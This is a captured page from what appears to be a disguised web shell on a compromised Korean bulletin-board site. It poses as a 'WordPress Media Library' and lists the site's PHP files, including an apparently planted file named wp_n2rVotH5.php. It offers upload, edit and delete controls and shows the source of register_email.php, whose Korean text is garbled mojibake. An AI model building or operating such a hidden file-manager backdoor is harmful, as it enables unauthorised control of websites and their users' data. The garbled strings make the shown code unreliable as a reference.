โ WordPress Media Library
File manager
๐ Media Files
๐ง _common.php
๐ง _head.php
๐ง _head.sub.php
๐ง _tail.php
๐ง _tail.sub.php
๐ง ajax.autosave.php
๐ง ajax.autosavedel.php
๐ง ajax.autosavelist.php
๐ง ajax.autosaveload.php
๐ง ajax.comment_token.php
๐ง ajax.filter.php
๐ง ajax.mb_email.php
๐ง ajax.mb_hp.php
๐ง ajax.mb_id.php
๐ง ajax.mb_nick.php
๐ง ajax.mb_recommend.php
๐ง alert.php
๐ง alert_close.php
๐ง board.php
๐ง board_head.php
๐ง board_list_update.php
๐ง board_tail.php
๐ง confirm.php
๐ง content.php
๐ง current_connect.php
๐ง db_table.optimize.php
๐ง delete.php
๐ง delete_all.php
๐ง delete_comment.php
๐ง download.php
๐ง email_certify.php
๐ง email_stop.php
๐ง faq.php
๐ง formmail.php
๐ง formmail_send.php
๐ง good.php
๐ง group.php
๐ง link.php
๐ง list.php
๐ง login.php
๐ง login_check.php
๐ง logout.php
๐ง member_confirm.php
๐ง member_leave.php
๐ง memo.php
๐ง memo_delete.php
๐ง memo_form.php
๐ง memo_form_update.php
๐ง memo_view.php
๐ง move.php
๐ง move_update.php
๐ง mypage.php
๐ง new.php
๐ง new_delete.php
๐ง newwin.inc.php
๐ง password.php
๐ง password_check.php
๐ง password_lost.php
๐ง password_lost2.php
๐ง password_lost_certify.php
๐ง point.php
๐ง poll_etc_update.php
๐ง poll_etc_update_mail.php
๐ง poll_result.php
๐ง poll_update.php
๐ง profile.php
๐ง qadelete.php
๐ง qadownload.php
๐ง qahead.php
๐ง qalist.php
๐ง qatail.php
๐ง qaview.php
๐ง qawrite.php
๐ง qawrite_update.php
๐ง register.php
๐ง register_email.php
๐ง register_email_update.php
๐ง register_form.php
๐ง register_form_update.php
๐ง register_form_update_mail1.php
๐ง register_form_update_mail2.php
๐ง register_form_update_mail3.php
๐ง register_result.php
๐ง rss.php
๐ง scrap.php
๐ง scrap_delete.php
๐ง scrap_popin.php
๐ง scrap_popin_update.php
๐ง search.php
๐ง sns_send.php
๐ง view.php
๐ง view_comment.php
๐ง view_image.php
๐ง visit_browscap.inc.php
๐ง visit_insert.inc.php
๐ง wp_n2rVotH5.php
๐ง write.php
๐ง write_comment_update.php
๐ง write_comment_update.sns.php
๐ง write_token.php
๐ง write_update.php
๐ง write_update_mail.php
๐ง zboard.php
โฌ๏ธ Upload Media
Upload File
๐ Edit: register_email.php
Size: 1.86 KB | Modified: 2019-01-10 22:38:00
<?php include_once('./_common.php'); include_once(G5_CAPTCHA_PATH.'/captcha.lib.php'); $g5['title'] = '๋ฉ์ผ์ธ์ฆ ๋ฉ์ผ์ฃผ์ ๋ณ๊ฒฝ'; include_once('./_head.php'); $mb_id = substr(clean_xss_tags($_GET['mb_id']), 0, 20); $sql = " select mb_email, mb_datetime, mb_ip, mb_email_certify from {$g5['member_table']} where mb_id = '{$mb_id}' "; $mb = sql_fetch($sql); if (substr($mb['mb_email_certify'],0,1)!=0) { alert("์ด๋ฏธ ๋ฉ์ผ์ธ์ฆ ํ์ ํ์์ ๋๋ค.", G5_URL); } $ckey = trim($_GET['ckey']); $key = md5($mb['mb_ip'].$mb['mb_datetime']); if(!$ckey || $ckey != $key) alert('์ฌ๋ฐ๋ฅธ ๋ฐฉ๋ฒ์ผ๋ก ์ด์ฉํด ์ฃผ์ญ์์ค.', G5_URL); ?> <p class="rg_em_p">๋ฉ์ผ์ธ์ฆ์ ๋ฐ์ง ๋ชปํ ๊ฒฝ์ฐ ํ์์ ๋ณด์ ๋ฉ์ผ์ฃผ์๋ฅผ ๋ณ๊ฒฝ ํ ์ ์์ต๋๋ค.</p> <form method="post" name="fregister_email" action="<?php echo G5_HTTPS_BBS_URL.'/register_email_update.php'; ?>" onsubmit="return fregister_email_submit(this);"> <input type="hidden" name="mb_id" value="<?php echo $mb_id; ?>"> <div class="tbl_frm01 tbl_frm rg_em"> <table> <caption>์ฌ์ดํธ ์ด์ฉ์ ๋ณด ์ ๋ ฅ</caption> <tr> <th scope="row"><label for="reg_mb_email">E-mail<strong class="sound_only">ํ์</strong></label></th> <td><input type="text" name="mb_email" id="reg_mb_email" required class="frm_input email required" size="30" maxlength="100" value="<?php echo $mb['mb_email']; ?>"></td> </tr> <tr> <th scope="row">์๋๋ฑ๋ก๋ฐฉ์ง</th> <td><?php echo captcha_html(); ?></td> </tr> </table> </div> <div class="btn_confirm"> <input type="submit" id="btn_submit" class="btn_submit" value="์ธ์ฆ๋ฉ์ผ๋ณ๊ฒฝ"> <a href="<?php echo G5_URL ?>" class="btn_cancel">์ทจ์</a> </div> </form> <script> function fregister_email_submit(f) { <?php echo chk_captcha_js(); ?> return true; } </script> <?php include_once('./_tail.php'); ?>
๐พ Save Changes
๐ฅ Download
๐๏ธ Delete